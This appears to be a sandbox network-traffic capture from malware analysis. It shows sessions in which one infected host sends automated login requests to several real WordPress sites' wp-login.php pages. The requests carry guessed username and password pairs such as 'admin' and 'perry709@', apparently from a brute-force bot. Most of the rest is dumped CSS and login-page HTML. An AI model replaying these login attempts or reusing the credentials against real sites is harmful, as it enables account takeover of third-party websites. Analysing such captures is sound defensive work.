2023-12-22 20:15:16 UTC	16384	IN	Data Raw: 23 54 6f 70 5f 62 61 72 20 2e 77 70 6d 6c 2d 6c 61 6e 67 75 61 67 65 73 2c 2e 6d 65 6e 75 6f 2d 6e 6f 2d 62 6f 72 64 65 72 73 2e 68 65 61 64 65 72 2d 70 6c 61 69 6e 20 23 54 6f 70 5f 62 61 72 20 61 2e 61 63 74 69 6f 6e 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 7d 2e 6d 65 6e 75 6f 2d 72 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 5f 77 72 61 70 70 65 72 7b 66 6c 6f 61 74 3a 72 69 67 68 74 7d 2e 6d 65 6e 75 6f 2d 72 69 67 68 74 2e 68 65 61 64 65 72 2d 73 74 61 63 6b 3a 6e 6f 74 28 2e 68 65 61 64 65 72 2d 63 65 6e 74 65 72 29 20 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 5f 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 30 70 78 7d 62 6f 64 79 2e 68 65 61 64 65 72 2d 63 72 65 61 74 69 76 65 7b 70 61 Data Ascii: #Top_bar .wpml-languages,.menuo-no-borders.header-plain #Top_bar a.action_button{border-width:0}.menuo-right #Top_bar .menu_wrapper{float:right}.menuo-right.header-stack:not(.header-center) #Top_bar .menu_wrapper{margin-right:150px}body.header-creative{pa
2023-12-22 20:15:16 UTC	729	IN	Data Raw: 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 70 6c 61 69 6e 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 70 6c 69 74 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 68 6f 70 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 68 6f 70 2d 73 70 6c 69 74 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 74 61 63 6b 20 23 41 63 74 69 6f 6e 5f 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 43 32 43 32 43 7d 23 53 6c 69 64 69 6e 67 2d 74 6f 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 33 66 33 7d 23 53 6c 69 64 69 6e 67 2d 74 6f 70 20 61 2e 73 6c 69 64 69 6e 67 2d 74 6f 70 2d 63 6f 6e 74 72 6f 6c 7b 62 6f 72 64 65 72 2d 72 69 67 68 Data Ascii: #Action_bar,.header-plain #Action_bar,.header-split #Action_bar,.header-shop #Action_bar,.header-shop-split #Action_bar,.header-stack #Action_bar{background-color:#2C2C2C}#Sliding-top{background-color:#f3f3f3}#Sliding-top a.sliding-top-control{border-righ
2023-12-22 20:15:16 UTC	16384	IN	Data Raw: 39 64 63 34 0d 0a 6e 65 5f 69 74 65 6d 73 2c 2e 69 63 6f 6e 5f 62 6f 78 20 61 20 2e 64 65 73 63 2c 2e 69 63 6f 6e 5f 62 6f 78 20 61 3a 68 6f 76 65 72 20 2e 64 65 73 63 2c 2e 66 65 61 74 75 72 65 5f 6c 69 73 74 20 75 6c 20 6c 69 20 61 2c 2e 6c 69 73 74 5f 69 74 65 6d 20 61 2c 2e 6c 69 73 74 5f 69 74 65 6d 20 61 3a 68 6f 76 65 72 2c 2e 77 69 64 67 65 74 5f 72 65 63 65 6e 74 5f 65 6e 74 72 69 65 73 20 75 6c 20 6c 69 20 61 2c 2e 66 6c 61 74 5f 62 6f 78 20 61 2c 2e 66 6c 61 74 5f 62 6f 78 20 61 3a 68 6f 76 65 72 2c 2e 73 74 6f 72 79 5f 62 6f 78 20 2e 64 65 73 63 2c 2e 63 6f 6e 74 65 6e 74 5f 73 6c 69 64 65 72 2e 63 61 72 6f 75 73 65 6c 20 20 75 6c 20 6c 69 20 61 20 2e 74 69 74 6c 65 2c 2e 63 6f 6e 74 65 6e 74 5f 73 6c 69 64 65 72 2e 66 6c 61 74 2e 64 65 73 63 Data Ascii: 9dc4ne_items,.icon_box a .desc,.icon_box a:hover .desc,.feature_list ul li a,.list_item a,.list_item a:hover,.widget_recent_entries ul li a,.flat_box a,.flat_box a:hover,.story_box .desc,.content_slider.carousel ul li a .title,.content_slider.flat.desc
2023-12-22 20:15:17 UTC	16384	IN	Data Raw: 69 65 73 20 75 6c 20 6c 69 3a 61 66 74 65 72 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 6d 66 6e 5f 6d 65 6e 75 20 75 6c 20 6c 69 20 61 3a 68 6f 76 65 72 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 70 72 6f 64 75 63 74 5f 63 61 74 65 67 6f 72 69 65 73 20 75 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 61 32 63 32 65 7d 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 52 65 63 65 6e 74 5f 70 6f 73 74 73 20 75 6c 20 6c 69 20 61 20 2e 64 65 73 63 20 2e 64 61 74 65 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 72 65 63 65 6e 74 5f 65 6e 74 72 69 65 73 20 75 6c 20 6c 69 20 2e 70 6f 73 74 2d 64 61 74 65 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 74 70 5f 72 65 63 65 6e 74 5f 74 77 65 65 74 73 20 2e Data Ascii: ies ul li:after,.mfn-footer .widget_mfn_menu ul li a:hover,.mfn-footer .widget_product_categories ul{background-color:#2a2c2e}.mfn-footer .Recent_posts ul li a .desc .date,.mfn-footer .widget_recent_entries ul li .post-date,.mfn-footer .tp_recent_tweets .
2023-12-22 20:15:17 UTC	7633	IN	Data Raw: 20 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 20 3a 20 77 69 6e 64 6f 77 2e 52 53 49 57 3b 0a 09 09 09 09 77 69 6e 64 6f 77 2e 52 53 49 48 20 3d 20 77 69 6e 64 6f 77 2e 52 53 49 48 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 20 3f 20 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 20 3a 20 77 69 6e 64 6f 77 2e 52 53 49 48 3b 0a 09 09 09 09 74 72 79 20 7b 0a 09 09 09 09 09 76 61 72 20 70 77 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 2e 63 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 0a 09 09 09 09 09 09 6e 65 77 68 3b 0a 09 09 09 09 09 70 77 20 3d 20 70 77 3d 3d 3d 30 20 7c 7c 20 69 73 4e 61 4e 28 70 77 29 20 7c 7c 20 28 65 2e 6c 3d 3d 22 66 75 6c 6c 77 69 64 74 68 22 20 7c 7c 20 Data Ascii: window.innerWidth : window.RSIW;window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH;try {var pw = document.getElementById(e.c).parentNode.offsetWidth,newh;pw = pw===0 \|\| isNaN(pw) \|\| (e.l=="fullwidth" \|\|

Session ID	Source IP	Source Port	Destination IP	Destination Port
357	192.168.2.4	60466	104.21.52.80	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:15 UTC	240	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Fcannaclear.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:16 UTC	1347	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:15:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() cf-mitigated: challenge Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=57o6boY%2BcrMItg8UuoCCbCbf1ubRXgZSrAraB5nuvd1Cj%2FcJ0UbfKrzDm3FmnQbBAytPJA83n%2BcRHX%2Fca2UEazfnZb3ESt46YC1i55f%2BRyeLk5DHr3tgU2%2FUzJOY6AiKRA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b092dfc0b8e00-MIA
2023-12-22 20:15:16 UTC	32	IN	Data Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:16 UTC	1369	IN	Data Raw: 31 39 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 19e4<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2023-12-22 20:15:16 UTC	1369	IN	Data Raw: 35 4a 52 31 75 6d 32 53 37 68 37 59 7a 7a 59 6d 75 32 6b 2d 31 37 30 33 32 37 36 31 31 36 2d 31 2d 41 5a 4e 79 53 4b 74 30 58 70 4b 42 4b 69 53 6e 56 37 67 38 4e 67 62 62 6a 56 36 6e 36 4a 70 70 47 7a 33 49 75 44 72 4c 61 58 73 4f 43 79 31 34 4e 75 6e 32 56 61 49 39 6b 64 62 63 62 59 4c 54 45 58 76 6c 6b 67 65 76 37 39 35 49 4a 44 72 33 58 57 43 69 56 6a 78 68 47 4c 66 6e 68 79 63 48 4b 52 6b 35 70 76 52 72 6e 72 4c 53 36 4a 49 53 52 52 63 4e 4d 68 51 62 6c 4b 79 2d 68 56 61 6f 47 45 53 4b 37 4c 32 78 44 62 57 39 32 69 71 73 57 4c 36 36 62 4d 47 6d 66 70 51 73 43 74 70 31 48 6c 4f 58 73 4e 5a 64 34 38 58 5a 41 78 48 4f 43 59 44 37 65 34 62 51 59 35 76 62 42 50 74 54 38 65 6e 66 5f 68 72 45 6d 38 66 79 6a 6f 73 64 52 6d 4b 4f 35 6e 55 70 6a 47 37 6b 6f 70 Data Ascii: 5JR1um2S7h7YzzYmu2k-1703276116-1-AZNySKt0XpKBKiSnV7g8NgbbjV6n6JppGz3IuDrLaXsOCy14Nun2VaI9kdbcbYLTEXvlkgev795IJDr3XWCiVjxhGLfnhycHKRk5pvRrnrLS6JISRRcNMhQblKy-hVaoGESK7L2xDbW92iqsWL66bMGmfpQsCtp1HlOXsNZd48XZAxHOCYD7e4bQY5vbBPtT8enf_hrEm8fyjosdRmKO5nUpjG7kop
2023-12-22 20:15:16 UTC	1369	IN	Data Raw: 30 43 62 79 55 4e 67 65 43 33 76 6a 4c 56 6f 6f 44 35 6f 64 76 54 78 61 66 32 6d 59 76 34 2d 4d 32 46 43 36 4d 5a 4e 41 43 5a 54 6d 71 58 46 36 7a 58 5a 56 45 57 59 72 62 39 6a 71 75 6b 7a 4c 4f 75 71 6e 79 50 72 52 4a 6a 6d 54 79 39 6f 33 73 47 35 4f 6e 78 4e 4d 51 63 61 51 48 45 43 56 72 68 36 56 39 58 57 74 6b 4f 6c 35 39 79 45 58 75 55 62 6b 63 63 51 74 5a 38 65 46 77 7a 6a 61 48 5a 6f 5f 32 75 4e 61 64 66 72 68 49 44 72 74 74 4b 6d 31 6d 50 4a 45 34 46 70 69 38 36 58 37 6c 34 35 58 47 74 70 53 75 52 77 39 75 6c 76 53 7a 45 37 38 58 6a 49 72 46 4e 6c 52 4a 48 44 51 55 71 65 44 51 45 52 59 4b 6e 37 79 58 4b 74 6d 37 48 4f 31 4b 4d 67 49 35 6b 67 49 61 74 36 38 7a 35 68 6d 45 30 2d 39 42 64 4c 71 64 4b 49 70 65 55 6b 45 63 4a 39 73 31 43 66 62 48 5f 65 Data Ascii: 0CbyUNgeC3vjLVooD5odvTxaf2mYv4-M2FC6MZNACZTmqXF6zXZVEWYrb9jqukzLOuqnyPrRJjmTy9o3sG5OnxNMQcaQHECVrh6V9XWtkOl59yEXuUbkccQtZ8eFwzjaHZo_2uNadfrhIDrttKm1mPJE4Fpi86X7l45XGtpSuRw9ulvSzE78XjIrFNlRJHDQUqeDQERYKn7yXKtm7HO1KMgI5kgIat68z5hmE0-9BdLqdKIpeUkEcJ9s1CfbH_e
2023-12-22 20:15:16 UTC	1369	IN	Data Raw: 37 50 74 45 70 71 4d 7a 76 6a 50 4c 74 65 78 73 46 6e 32 50 63 6e 77 6c 4f 5a 76 4d 6e 79 74 37 55 67 58 69 73 62 42 42 42 75 35 42 75 46 4c 35 6e 64 5a 33 6c 56 31 70 59 77 68 72 51 4f 4d 53 69 45 45 71 6a 30 55 5a 38 4d 54 62 4e 44 54 69 33 36 66 70 46 46 6d 76 76 6b 65 68 6e 70 72 68 55 32 44 4f 65 76 64 78 5a 58 43 73 4e 48 4e 30 34 34 6c 61 62 34 55 4e 61 34 67 53 6f 70 4f 45 34 6c 42 69 61 68 39 78 6b 41 49 34 50 47 44 6c 64 74 79 4b 6d 43 58 66 4e 67 33 56 59 50 79 6e 6b 46 33 53 53 39 5f 68 58 6a 53 51 73 35 51 67 72 72 74 53 6f 77 43 64 4a 53 76 45 4e 4e 7a 76 32 4d 73 68 45 45 38 61 31 4d 51 76 30 76 64 77 75 54 69 74 42 35 31 4d 35 48 41 76 48 78 72 41 57 47 35 61 4d 6b 48 78 34 79 68 70 77 69 71 70 59 42 61 4b 78 6c 49 64 4b 58 6e 44 73 69 44 Data Ascii: 7PtEpqMzvjPLtexsFn2PcnwlOZvMnyt7UgXisbBBBu5BuFL5ndZ3lV1pYwhrQOMSiEEqj0UZ8MTbNDTi36fpFFmvvkehnprhU2DOevdxZXCsNHN044lab4UNa4gSopOE4lBiah9xkAI4PGDldtyKmCXfNg3VYPynkF3SS9_hXjSQs5QgrrtSowCdJSvENNzv2MshEE8a1MQv0vdwuTitB51M5HAvHxrAWG5aMkHx4yhpwiqpYBaKxlIdKXnDsiD
2023-12-22 20:15:16 UTC	1160	IN	Data Raw: 58 4d 57 6b 34 54 59 49 68 71 45 59 4e 49 37 59 39 62 44 69 41 3d 3d 27 2c 69 32 3a 20 27 4e 4c 6b 58 2b 71 6b 37 48 45 74 6e 4c 55 51 52 70 50 6b 38 78 77 3d 3d 27 2c 7a 68 3a 20 27 75 71 69 72 30 2b 4e 47 35 41 77 37 53 73 38 6b 7a 68 55 7a 45 4b 48 78 45 31 6c 46 65 58 48 30 35 6a 7a 41 55 42 58 36 32 34 30 3d 27 2c 75 68 3a 20 27 66 6a 56 4a 58 72 54 59 2b 4c 78 30 7a 65 74 56 79 2f 42 72 64 6a 6f 51 68 6e 65 59 49 62 36 69 4b 39 46 6c 2f 76 58 6d 42 6f 73 3d 27 2c 68 68 3a 20 27 77 5a 4d 71 61 44 45 64 32 33 2b 47 58 70 48 73 63 42 4d 72 56 4e 36 4a 4c 53 65 45 43 4e 2b 47 6a 47 6d 6a 72 36 37 5a 47 34 67 3d 27 2c 7d 7d 3b 76 61 72 20 63 70 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b Data Ascii: XMWk4TYIhqEYNI7Y9bDiA==',i2: 'NLkX+qk7HEtnLUQRpPk8xw==',zh: 'uqir0+NG5Aw7Ss8kzhUzEKHxE1lFeXH05jzAUBX6240=',uh: 'fjVJXrTY+Lx0zetVy/BrdjoQhneYIb6iK9Fl/vXmBos=',hh: 'wZMqaDEd23+GXpHscBMrVN6JLSeECN+GjGmjr67ZG4g=',}};var cpo = document.createElement('script');
2023-12-22 20:15:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
358	192.168.2.4	60454	50.31.65.5	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:15 UTC	344	OUT	POST /wp-login.php HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP+Cookie+check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://saltdelcolom.com/wp-login.php Content-Length: 146 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:15 UTC	146	OUT	Data Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 39 25 33 46 25 33 46 30 51 25 33 46 25 33 46 25 32 31 43 6b 25 33 46 25 32 35 4e 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 45 6e 74 72 61 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=admin&pwd=9%3F%3F0Q%3F%3F%21Ck%3F%25N&rememberme=forever&wp-submit=Entra&redirect_to=https%3A%2F%2Fsaltdelcolom.com%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:20 UTC	353	IN	HTTP/1.1 200 OK Connection: close content-type: text/html content-length: 1686 date: Fri, 22 Dec 2023 20:15:20 GMT server: LiteSpeed cache-control: no-cache,no-store alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:20 UTC	1015	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 Data Ascii: <!DOCTYPE html><html><head> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252
2023-12-22 20:15:20 UTC	671	IN	Data Raw: 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 63 61 70 74 63 68 61 2d 63 65 6e 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 35 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 33 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 31 33 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 Data Ascii: n-top: 10px; text-align: center; } .recaptcha-center { margin-top: 35px; margin-bottom: 20px; margin-left: 13%; margin-right: 13%; display: block; } </style></head><body> <d

Session ID	Source IP	Source Port	Destination IP	Destination Port
359	192.168.2.4	60610	104.26.0.173	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:15 UTC	455	OUT	POST /wp-login.php HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=ib4okdprhacs3t0dbu7ha45v80 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 Content-Length: 138 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:15 UTC	138	OUT	Data Raw: 6c 6f 67 3d 70 65 72 72 79 37 30 39 25 34 30 26 70 77 64 3d 70 65 72 72 79 37 30 39 25 34 30 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=perry709%40&pwd=perry709%40&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:16 UTC	870	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure X-Mod-Pagespeed: 1.13.35.2-0 Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bnG66YjaIfrAoYj7%2BmzmSh2riGvMduWny7j9X4lrC%2FYGyCirpMx%2BaGRiDhsCmzTQqDOyqYBWyx9rQWaMXiK9tyUWdedNjAGsRa4ZMFPkfa4RRPKysKK1q%2BxEb2iE6GHCb7bZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b092e58062887-MIA
2023-12-22 20:15:16 UTC	499	IN	Data Raw: 31 38 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 181b<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:16 UTC	1369	IN	Data Raw: 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 Data Ascii: link rel='stylesheet' id='forms-css' href='https://theproducebox.com/wp-admin/css/forms.min.css?ver=6.4.2' media='all'/><link rel='stylesheet' id='l10n-css' href='https://theproducebox.com/wp-admin/css/l10n.min.css?ver=6.4.2' media='all'/><link rel='sty
2023-12-22 20:15:16 UTC	1369	IN	Data Raw: 09 3c 2f 70 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 73 65 72 2d 70 61 73 73 2d 77 72 61 70 22 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 70 77 64 22 3e 0a 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 70 77 64 22 20 69 64 3d 22 75 73 65 72 5f 70 61 73 73 22 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 22 6c 6f 67 69 6e 5f 65 72 72 6f 72 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 20 70 61 73 73 77 6f 72 64 2d 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 Data Ascii: </p><div class="user-pass-wrap"><label for="user_pass">Password</label><div class="wp-pwd"><input 